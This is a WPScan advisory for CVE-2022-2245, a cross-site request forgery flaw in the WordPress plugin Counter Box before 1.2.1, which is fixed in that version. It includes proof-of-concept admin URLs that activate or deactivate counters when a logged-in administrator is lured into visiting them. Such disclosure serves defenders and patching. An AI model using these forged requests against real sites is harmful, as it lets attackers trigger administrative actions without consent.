WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Counter Box < 1.2.1 - Arbitrary Counter Activation/Deactivation via CSRF

Description

The plugin is lacking CSRF check when activating and deactivating counters, which could allow attackers to make a logged in admin perform such actions via CSRF attacks

Proof of Concept

https://example.com/wp-admin/admin.php?page=counter-box&id=1&action=activate
https://example.com/wp-admin/admin.php?page=counter-box&id=1&action=deactivate

Affects Plugins

counter-box
Fixed in version 1.2.1

References

CVE
CVE-2022-2245

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Raad Haddad

Submitter

Raad Haddad

Submitter twitter
raadfhaddad
Verified

Yes

WPVDB ID
33705003-1f82-4b0c-9b4b-d4de75da309c

Timeline

Publicly Published

2022-07-08 (about 1 months ago)

Added

2022-07-08 (about 1 months ago)

Last Updated

2022-07-08 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin